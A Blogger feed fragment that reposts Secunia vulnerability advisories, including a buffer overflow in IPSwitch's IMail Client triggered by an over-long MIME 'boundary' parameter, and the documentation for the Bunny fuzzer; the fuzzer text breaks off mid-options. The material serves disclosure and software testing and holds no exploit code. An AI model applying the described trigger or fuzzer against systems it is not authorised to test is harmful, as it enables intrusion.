/&gt;&lt;br /&gt;Please verify this advisory by visiting the Secunia website:&lt;br /&gt;http://secunia.com/secunia_research/2007-76/&lt;br /&gt;&lt;br /&gt;Complete list of vulnerability reports published by Secunia Research:&lt;br /&gt;http://secunia.com/secunia_research/&lt;br /&gt;&lt;br /&gt;======================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-6692306353019236492?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/6692306353019236492/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=6692306353019236492' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6692306353019236492'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6692306353019236492'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/cups-ipp-tags-memory-corruption.html' title='CUPS IPP Tags Memory Corruption Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5818472114222431079</id><published>2008-02-08T07:04:00.000-08:00</published><updated>2008-02-08T07:05:33.322-08:00</updated><title type='text'>IPSwitch IMail Server IMail Client Buffer Overflow</title><content type='html'>Tomado de:http://secunia.com/secunia_research/2007-81/advisory/&lt;br /&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="2" style="border: 1px solid black; padding-left: 3px;color:#e3e3e3;" bg height="20"&gt;&lt;span style="font-size: 11px;color:BLACK;" &gt;&lt;b&gt;Secunia Research: IPSwitch IMail Server IMail Client Buffer Overflow&lt;/b&gt;&lt;/span&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;   &lt;td&gt;&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;   &lt;td colspan="2"&gt;    &lt;pre&gt;======================================================================&lt;br /&gt;&lt;br /&gt;                    Secunia Research 30/10/2007&lt;br /&gt;&lt;br /&gt;       - IPSwitch IMail Server IMail Client Buffer Overflow -&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;Table of Contents&lt;br /&gt;&lt;br /&gt;Affected Software....................................................1&lt;br /&gt;Severity.............................................................2&lt;br /&gt;Vendor's Description of Software.....................................3&lt;br /&gt;Description of Vulnerability.........................................4&lt;br /&gt;Solution.............................................................5&lt;br /&gt;Time Table...........................................................6&lt;br /&gt;Credits..............................................................7&lt;br /&gt;References...........................................................8&lt;br /&gt;About Secunia........................................................9&lt;br /&gt;Verification........................................................10&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;1) Affected Software&lt;br /&gt;&lt;br /&gt;* IMail Client 9.22 included with IPSwitch IMail Server 2006.22.&lt;br /&gt;&lt;br /&gt;NOTE: Other versions may also be affected.&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;2) Severity&lt;br /&gt;&lt;br /&gt;Rating: Moderately critical&lt;br /&gt;Impact: Denial of Service&lt;br /&gt;       System compromise&lt;br /&gt;Where:  Remote&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;3) Vendor's Description of Software&lt;br /&gt;&lt;br /&gt;The IMail Client "is provided for those who are administering IMail&lt;br /&gt;Server on the NT workstation on which IMail Server is installed. It is&lt;br /&gt;useful for reading the 'root' mailbox, working with seldom-used&lt;br /&gt;accounts, and testing.".&lt;br /&gt;&lt;br /&gt;Product Link:&lt;br /&gt;http://www.ipswitch.com/purchase/products/imail_server.asp&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;4) Description of Vulnerability&lt;br /&gt;&lt;br /&gt;Secunia Research has discovered a vulnerability in the IMail Client,&lt;br /&gt;which potentially can be exploited by malicious people to compromise a&lt;br /&gt;user's system.&lt;br /&gt;&lt;br /&gt;The vulnerability is caused due to a boundary error within the IMail&lt;br /&gt;Client when processing emails containing multipart MIME data. This can&lt;br /&gt;be exploited to cause a data segment-based buffer overflow via an&lt;br /&gt;overly long "boundary" parameter (more than 212 bytes).&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;5) Solution&lt;br /&gt;&lt;br /&gt;The vendor recommends users to delete the IMail Client application,&lt;br /&gt;which will be removed from the next major release of the IPSwitch&lt;br /&gt;IMail Server.&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;6) Time Table&lt;br /&gt;&lt;br /&gt;24/09/2007 - Vendor notified.&lt;br /&gt;25/09/2007 - Vendor response.&lt;br /&gt;30/10/2007 - Public disclosure.&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;7) Credits&lt;br /&gt;&lt;br /&gt;Discovered by Secunia Research.&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;8) References&lt;br /&gt;&lt;br /&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned&lt;br /&gt;CVE-2007-4345 for the vulnerability.&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;9) About Secunia&lt;br /&gt;&lt;br /&gt;Secunia offers vulnerability management solutions to corporate&lt;br /&gt;customers with verified and reliable vulnerability intelligence&lt;br /&gt;relevant to their specific system configuration:&lt;br /&gt;&lt;br /&gt;http://corporate.secunia.com/&lt;br /&gt;&lt;br /&gt;Secunia also provides a publicly accessible and comprehensive advisory&lt;br /&gt;database as a service to the security community and private&lt;br /&gt;individuals, who are interested in or concerned about IT-security.&lt;br /&gt;&lt;br /&gt;http://secunia.com/&lt;br /&gt;&lt;br /&gt;Secunia believes that it is important to support the community and to&lt;br /&gt;do active vulnerability research in order to aid improving the&lt;br /&gt;security and reliability of software in general:&lt;br /&gt;&lt;br /&gt;http://corporate.secunia.com/secunia_research/33/&lt;br /&gt;&lt;br /&gt;Secunia regularly hires new skilled team members. Check the URL below&lt;br /&gt;to see currently vacant positions:&lt;br /&gt;&lt;br /&gt;http://secunia.com/secunia_vacancies/&lt;br /&gt;&lt;br /&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:&lt;br /&gt;&lt;br /&gt;http://secunia.com/secunia_security_advisories/&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;10) Verification&lt;br /&gt;&lt;br /&gt;Please verify this advisory by visiting the Secunia website:&lt;br /&gt;http://secunia.com/secunia_research/2007-81/&lt;br /&gt;&lt;br /&gt;Complete list of vulnerability reports published by Secunia Research:&lt;br /&gt;http://secunia.com/secunia_research/&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5818472114222431079?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5818472114222431079/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5818472114222431079' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5818472114222431079'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5818472114222431079'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/ipswitch-imail-server-imail-client.html' title='IPSwitch IMail Server IMail Client Buffer Overflow'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5983908544591046937</id><published>2008-02-08T07:02:00.000-08:00</published><updated>2008-02-08T07:03:29.937-08:00</updated><title type='text'>Bunny the Fuzzer</title><content type='html'>&lt;div id="wikiheader" style="margin-bottom: 1em;"&gt;Tomado de : http://code.google.com/p/bunny-the-fuzzer/wiki/BunnyDoc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 120%; font-weight: bold;"&gt;BunnyDoc&lt;/span&gt;           &lt;div style="font-style: italic; margin-top: 3px;"&gt;Project documentation&lt;/div&gt;    &lt;/div&gt;    &lt;div id="wikicontent"&gt;  &lt;h1&gt;Bunny the Fuzzer&lt;/h1&gt;&lt;ul&gt;&lt;li&gt;Written and maintained by &lt;a href="http://lcamtuf.coredump.cx/" rel="nofollow"&gt;Michal Zalewski&lt;/a&gt; &lt;&lt;a href="mailto:lcamtuf@google.com" rel="nofollow"&gt;lcamtuf@google.com&lt;/a&gt;&gt;.  &lt;/li&gt;&lt;li&gt;Copyright 2007 Google Inc, rights reserved. &lt;/li&gt;&lt;li&gt;Released under terms and conditions of the Apache License, version 2.0. &lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;What is this?&lt;/h2&gt;&lt;p&gt;Bunny is a closed loop (feedback driven), high-performance, general purpose protocol-blind fuzzer for C programs (though in principle easily portable to any other imperative procedural language). &lt;/p&gt;&lt;p&gt;The novelty of this tool arises from its use of compiler-level integration to seamlessly inject precise and reliable instrumentation hooks into the traced program. These hooks enable the fuzzer to receive real-time feedback on changes to the function call path, call parameters, and return values in response to variations in the input data. &lt;/p&gt;&lt;p&gt;This architecture makes it possible (and quite simple!) to significantly improve the coverage of the testing process without a noticeable performance impact usually associated with other attempts to peek into run-time internals. &lt;/p&gt;&lt;h2&gt;Why bother?&lt;/h2&gt;&lt;p&gt;Traditional fuzzing offers a very shallow code penetration for non-trivial applications and input formats. If a file of a hundred bytes or so needs to have three bits flipped to a particular value to reach a vulnerable function, the likelihood of this being stumbled upon by a regular fuzzer is negligible. &lt;/p&gt;&lt;p&gt;To work around this problem, specialized fuzzers are devised to properly handle specifics of the tested protocol, and focus on known tricky inputs. Unfortunately, this approach is time-consuming, and initial assumptions made by the operator may artificially limit test coverage. &lt;/p&gt;&lt;p&gt;"Smart" fuzzers that observe changes in the execution of a process in response to changes to the input data should in theory be able to overcome many of these limitations. Unfortunately, most designs proposed to date attempted to instrument run-time disassembly, trace applications step-by-step, or take similar expensive routes, suffering a massive performance blow that effectively canceled out any efficiency gain. &lt;/p&gt;&lt;p&gt;Bunny tries to approach the challenge from a slightly different angle, and injects scalable, high-performance probes during precompilation stage. This results in several key advantages: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;The approach does not feature a steep setup or learning curve. There is no training or protocol knowledge necessary; any project can be automatically instrumented with a drop-in replacement for GCC, and is immediately ready for testing: &lt;/li&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;      CC&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="str"&gt;/path/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;bunny&lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;gcc .&lt;/span&gt;&lt;span class="str"&gt;/configure&lt;br /&gt;      make&lt;/span&gt;&lt;/pre&gt;&lt;li&gt;There is no significant performance penalty involved. Core fuzzing components are designed for highest speed, and feature cyclic SHM output buffers with userland spinlocks, keep-alive architecture, and syscall overhead limited to bare minimum. The instrumentation is injected in key HLL control points, limiting the amount of data to be analyzed. On a typical dual-core P4 desktop, fuzzing of a small utility peaks at 3600 execs/second, compared to 4000 for a dummy loop. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Both small and large real-life components can be instrumented and tested alike. From zlib to libpng to OpenSSH, there is no need to alter the build and testing process. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Fine-grained configuration and easy automation. The fuzzer implements 9 neat fuzzing strategies and offers detailed controls over their behavior, fuzzing depth, and the like. It features automated crash case sorting and annotation and random-run scenarios for unattended, massively parallel setups. &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Smart features aside, Bunny is a good "classic" fuzzing application, too - with network output support and a number of fairly comprehensive fault injection strategies, it can be used to attack non-instrumented applications as well. &lt;/p&gt;&lt;h2&gt;You mentioned prior work, eh?&lt;/h2&gt;&lt;p&gt;Yes; several other folks toyed with the idea in the past and released papers on this topic - most notably: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://research.microsoft.com/users/pg/public_psfiles/SAGE-external-v1.pdf" rel="nofollow"&gt;Automated Whitebox Fuzz Testing&lt;/a&gt; by Godefroid, Levin, Molnar &lt;/li&gt;&lt;li&gt;&lt;a href="http://homes.dico.unimi.it/%7Emonga/lib/sess07/28300052.pdf" rel="nofollow"&gt;A Smart Fuzzer for x86 Executables&lt;/a&gt; by Lanzi, Martignoni, Monga, Paleari &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;These designs are difficult to independently evaluate, as they remain non-public, but generally employ assembly-level instrumentation, which would appear to provide output of lower analytic quality. &lt;/p&gt;&lt;p&gt;A related public work at Google is &lt;i&gt;Flayer&lt;/i&gt; by Will Drewry and Tavis Omandy - a Valgrind-based tool that can be used to reach potentially vulnerable code, then work your way up to figure out what inputs get you there: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://googleonlinesecurity.blogspot.com/2007/09/information-flow-tracing-and-software.html" rel="nofollow"&gt;Information flow tracing and software testing&lt;/a&gt; &lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;4. So how does it work, exactly?&lt;/h2&gt;&lt;p&gt;On a high level, the algorithm is remarkably simple: &lt;/p&gt;&lt;ol&gt;&lt;li&gt;Seed fuzzing queue with a known good input file. &lt;/li&gt;&lt;li&gt;Attempt several deterministic, sequential fuzzing strategies for subsequent regions in the input file, as well as for regions that are known to affect execution paths based on previously recorded data. &lt;/li&gt;&lt;li&gt;If any change resulted in a never previously observed execution path, store the input that triggered it and queue it for further testing. &lt;/li&gt;&lt;li&gt;If any change resulted in an interesting change in any function call parameter or return value within a known execution path (for example, we now have -3 where we had 7 previously), store and queue the input. &lt;/li&gt;&lt;li&gt;If program fault is sensed for any input (crash, hang, etc), record this event and make copy of the offending input data. &lt;/li&gt;&lt;li&gt;When done, fetch next input to be tested from queue, go to 2. &lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Bunny implements a total of 9 fuzzing stages: &lt;/p&gt;&lt;ol&gt;&lt;li&gt;Fully random fuzzing of known execution path effectors &lt;/li&gt;&lt;li&gt;Deterministic, walking bit flip of variable length &lt;/li&gt;&lt;li&gt;Deterministic, walking value set operation of variable length &lt;/li&gt;&lt;li&gt;Walking random value set of variable length &lt;/li&gt;&lt;li&gt;Deterministic, walking block deletion of variable length &lt;/li&gt;&lt;li&gt;Deterministic, walking block overwrite of variable length &lt;/li&gt;&lt;li&gt;Deterministic, walking block duplication of variable length &lt;/li&gt;&lt;li&gt;Deterministic, walking block swap of variable length &lt;/li&gt;&lt;li&gt;Random stacking of any of the above operation (last resort) &lt;/li&gt;&lt;/ol&gt;&lt;h2&gt;How do I use it?&lt;/h2&gt;&lt;p&gt;Compile the fuzzer suite itself (&lt;tt&gt;make&lt;/tt&gt;), then run the following against your target project: &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    cd &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;path&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;project&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    CC&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="str"&gt;/path/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;bunny&lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;gcc .&lt;/span&gt;&lt;span class="str"&gt;/configure&lt;br /&gt;    make&lt;/span&gt;&lt;/pre&gt;&lt;p&gt;Alternatively, simply use &lt;tt&gt;bunny-gcc&lt;/tt&gt; to compile any standalone code, exactly the way you would use GCC. The wrapper compiles OpenSSH, bash, and a number of other open source projects cleanly - but if you encounter problems, do let me know. &lt;/p&gt;&lt;p&gt;Once compiled, the resulting binary can be manually traced by invoking &lt;tt&gt;bunny-trace&lt;/tt&gt; utility to peek at how the fuzzer sees the world, for example: &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    &lt;/span&gt;&lt;span class="str"&gt;/path/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;bunny&lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;trace &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;path&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;executable&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;+++&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="typ"&gt;Trace&lt;/span&gt;&lt;span class="pln"&gt; of &lt;/span&gt;&lt;span class="str"&gt;'/path/to/executable'&lt;/span&gt;&lt;span class="pln"&gt; started at &lt;/span&gt;&lt;span class="lit"&gt;2007&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="lit"&gt;09&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="lit"&gt;07&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;21&lt;/span&gt;&lt;span class="pun"&gt;:&lt;/span&gt;&lt;span class="lit"&gt;06&lt;/span&gt;&lt;span class="pun"&gt;:&lt;/span&gt;&lt;span class="lit"&gt;01&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;+++&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;000&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;.-&lt;/span&gt;&lt;span class="pln"&gt; main&lt;/span&gt;&lt;span class="pun"&gt;()&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;001&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;|&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;.-&lt;/span&gt;&lt;span class="pln"&gt; foo1&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="lit"&gt;1&lt;/span&gt;&lt;span class="pun"&gt;)&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;001&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;|&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="str"&gt;`- = 7&lt;br /&gt;    [19179] 001 | .- foo2(2)&lt;br /&gt;    [19179] 001 | `&lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;9&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;001&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;|&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;.-&lt;/span&gt;&lt;span class="pln"&gt; something&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="lit"&gt;3&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;4&lt;/span&gt;&lt;span class="pun"&gt;)&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;001&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;|&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="str"&gt;`- = 0&lt;br /&gt;    [19179] 001 | .- name13(5, 6, 7)&lt;br /&gt;    [19179] 001 | `&lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;0&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;000&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;+---&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;10&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;19179&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="lit"&gt;000&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="str"&gt;`- = 0&lt;br /&gt;    --- Process 19179 exited (code=0) ---&lt;/span&gt;&lt;/pre&gt;&lt;p&gt;To run a proper fuzzing session, create a new directory (e.g., &lt;tt&gt;test&lt;/tt&gt;) with two empty subdirectories: &lt;tt&gt;in_dir&lt;/tt&gt; and &lt;tt&gt;out_dir&lt;/tt&gt;. Put the desired input file to use as a seed for fuzzing in &lt;tt&gt;in_dir&lt;/tt&gt;, under any name of your choice. Next, invoke &lt;tt&gt;bunny-main&lt;/tt&gt;, passing the paths to your input and output directories, as well as directions on how to reach the target application or network service, using appropriate command-line switches. &lt;/p&gt;&lt;p&gt;Two most common usage scenarios are: &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    mkdir test&lt;br /&gt;    mkdir test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;in_dir&lt;br /&gt;    mkdir test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;out_dir&lt;br /&gt;    cp sample&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;jpg test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;in_dir&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="com"&gt;# If program accepts data on stdout:&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    .&lt;/span&gt;&lt;span class="str"&gt;/bunny-main -i test/&lt;/span&gt;&lt;span class="pln"&gt;in_dir &lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;o test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;out_dir &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;path&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;app&lt;br /&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="com"&gt;# If program requires disk file input:&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    .&lt;/span&gt;&lt;span class="str"&gt;/bunny-main -i test/&lt;/span&gt;&lt;span class="pln"&gt;in_dir &lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;o test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;out_dir &lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;f test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;infile&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;jpg &lt;/span&gt;&lt;span class="pun"&gt;\&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;                  &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;path&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;to&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;app test&lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;infile&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;jpg&lt;/span&gt;&lt;/pre&gt;&lt;p&gt;And that's it - the output will be saved to &lt;tt&gt;out_dir/BUNNY.log&lt;/tt&gt;; crash cases will go to &lt;tt&gt;out_dir/FAULT*&lt;/tt&gt;. Sit back and relax. If you want fast and dirty results, consider adding &lt;tt&gt;-q&lt;/tt&gt; and &lt;tt&gt;-k&lt;/tt&gt; parameters to the command line. &lt;/p&gt;&lt;p&gt;For more sophisticated jobs, below is a list of all command line options supported by &lt;tt&gt;bunny-main&lt;/tt&gt; (defaults are reported when the program is called with &lt;tt&gt;-h&lt;/tt&gt; switch): &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    &lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt;f file     &lt;/span&gt;&lt;span class="pun"&gt;-&lt;/span&gt;&lt;span class="pln"&gt; write fuzzer output to specified file before each testing&lt;br /&gt;                  round&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt; instead of &lt;/span&gt;&lt;span class="kwd"&gt;using&lt;/span&gt;&lt;span class="pln"&gt; fuzzed application&lt;/span&gt;&lt;span class="str"&gt;'s stdin.&lt;br /&gt;&lt;br /&gt;    -t h:p      - write fuzzer output to a TCP server running at host '&lt;/span&gt;&lt;span class="pln"&gt;h&lt;/span&gt;&lt;span class="str"&gt;',&lt;br /&gt;                  port '&lt;/span&gt;&lt;span class="pln"&gt;p&lt;/span&gt;&lt;span class="str"&gt;', after launching the traced application.&lt;br /&gt;&lt;br /&gt;    -u h:p      - write fuzzer output to UDP server, likewise.&lt;br /&gt;&lt;br /&gt;    -l port     - write fuzzer output to the first TCP client to connect to&lt;br /&gt;                  specified port.&lt;br /&gt;&lt;br /&gt;  Execution control:&lt;br /&gt;&lt;br /&gt;    -s nn       - time out if no instrumentation feedback is received for '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;'&lt;br /&gt;                  milliseconds. Such a situation will be marked as a DoS&lt;br /&gt;                  condition and saved for analysis.&lt;br /&gt;&lt;br /&gt;    -x nn       - time out unconditionally after '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;' milliseconds.&lt;br /&gt;&lt;br /&gt;    -d          - allow "dummy" mode: perform a single round of fuzzing even&lt;br /&gt;                  if no instrumentation is detected in the traced application,&lt;br /&gt;                  and just detect crashes in response to dumb fuzzing.&lt;br /&gt;&lt;br /&gt;    -n          - do not abandon a fuzzing round in which a fault occurred.&lt;br /&gt;                  May end up producing 